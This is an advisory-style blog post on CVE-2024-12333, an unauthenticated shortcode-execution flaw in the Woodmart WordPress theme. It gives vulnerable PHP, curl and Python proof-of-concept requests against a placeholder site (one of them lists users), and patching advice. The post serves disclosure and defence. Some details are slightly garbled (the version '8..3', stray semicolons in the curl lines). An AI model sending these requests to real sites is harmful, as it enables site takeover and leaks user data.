CVE CyberSecurity Database News

CVE-2024-12333 - Remote Code Execution in Woodmart WordPress Theme (Up to v8..3) Explained With Exploit Code

Poster -

Woodmart is a popular premium theme for WordPress, powering thousands of ecommerce and business sites. In early 2024, a critical security vulnerability was found and catalogued as CVE-2024-12333. This flaw allows anyone — even users who aren't logged in — to execute arbitrary WordPress shortcodes on affected sites. That opens the door to privilege escalation, data exposure, and potentially full site compromises.

Below, we'll break down how this vulnerability works, what the exploit looks like, and what admins can do to protect their sites.

[References](#references)

## What is CVE-2024-12333?

All versions of the Woodmart theme prior to and including 8..3 are vulnerable to arbitrary shortcode execution via an AJAX action called woodmart_instagram_ajax_query. This action is available to unauthenticated users.

There is no proper validation or sanitization of the AJAX parameter passed to the server, which means an attacker can control the content passed to WordPress's do_shortcode function. This allows execution of any shortcode WordPress recognizes — including those from plugins or the WordPress core.


## How does the exploit work?

WordPress themes and plugins use shortcodes to add dynamic features. But running unsanitized user input through do_shortcode is highly dangerous.

WordPress executes the attacker's shortcode server-side.

This is especially problematic if the site has plugins that provide dangerous shortcodes (e.g., displaying user or admin info, running PHP, etc.)

Vulnerable code (simplified)

// from woodmart theme's AJAX handler
add_action('wp_ajax_woodmart_instagram_ajax_query', 'woodmart_instagram_handler');
add_action('wp_ajax_nopriv_woodmart_instagram_ajax_query', 'woodmart_instagram_handler');

function woodmart_instagram_handler() {
    $shortcode = $_POST['shortcode']; // NO VALIDATION
    echo do_shortcode($shortcode);    // DANGEROUS
    wp_die();
}

## Proof-of-Concept Exploit

You can exploit CVE-2024-12333 with a simple POST request. The endpoint is /wp-admin/admin-ajax.php and the action is woodmart_instagram_ajax_query. Supply any shortcode as the shortcode parameter.

Example: Reveal basic site info using WordPress's [site-title] shortcode.

Exploit in Bash (curl)

curl -X POST "https://victim.site/wp-admin/admin-ajax.php"; \
     -d "action=woodmart_instagram_ajax_query" \
     -d "shortcode=[site-title]"

Advanced Exploit

If there's a shortcode that outputs sensitive info, use it instead. If the site has another plugin with more dangerous shortcodes (sometimes allowing file read or even PHP execution!), the result could be catastrophic.

Example for listing all users (if a plugin provides [users] shortcode)

curl -X POST "https://victim.site/wp-admin/admin-ajax.php"; \
     -d "action=woodmart_instagram_ajax_query" \
     -d "shortcode=[users]"

Exploit in Python

import requests

url = "https://victim.site/wp-admin/admin-ajax.php";
data = {
  "action": "woodmart_instagram_ajax_query",
  "shortcode": "[site-title]"
}
r = requests.post(url, data=data)
print(r.text)

## Potential Impact

- Information Disclosure: Display site info, user lists, or sensitive details using built-in or plugin-supplied shortcodes.
- Privilege Escalation: If a plugin allows user or role modifications via shortcode, attackers can escalate privileges.
- Full Site Compromise: With code-execution shortcodes (e.g., certain 'PHP do' plugins), an attacker could fully take over the site.

Remember, some site builders or plugins offer shortcodes that allow for file inclusion, uploads, SQL queries, or raw PHP execution. Those are extremely dangerous in this context!


## Mitigation & Fix

Woodmart fixed this issue in version 8..4 and newer.

If you use Woodmart

- Update immediately to the latest version from Themeforest.

Audit your plugin stack for dangerous shortcodes.

- Consider using a WordPress firewall (like Wordfence or NinjaFirewall) that blocks rogue POST requests to admin-ajax.

Quick hotfix (not recommended long term):

Disable the vulnerable action in functions.php

remove_action('wp_ajax_nopriv_woodmart_instagram_ajax_query', 'woodmart_instagram_handler');

But still update to the latest version!


## References

- Official Woodmart changelog with fix (Themeforest)
- CVE-2024-12333 entry (NVD)
- WPScan vulnerability DB entry
- Wordfence Blog - Woodmart Shortcode Exploit


Bottom line:
If your site uses the Woodmart theme, update to 8..4 or newer ASAP. Arbitrary shortcode execution is about as critical as it gets for WordPress. Don't wait — attackers can exploit this without even logging in!


*Stay safe and spread the word to other Woodmart users!*

Timeline

Published on: 12/12/2024 09:15:05 UTC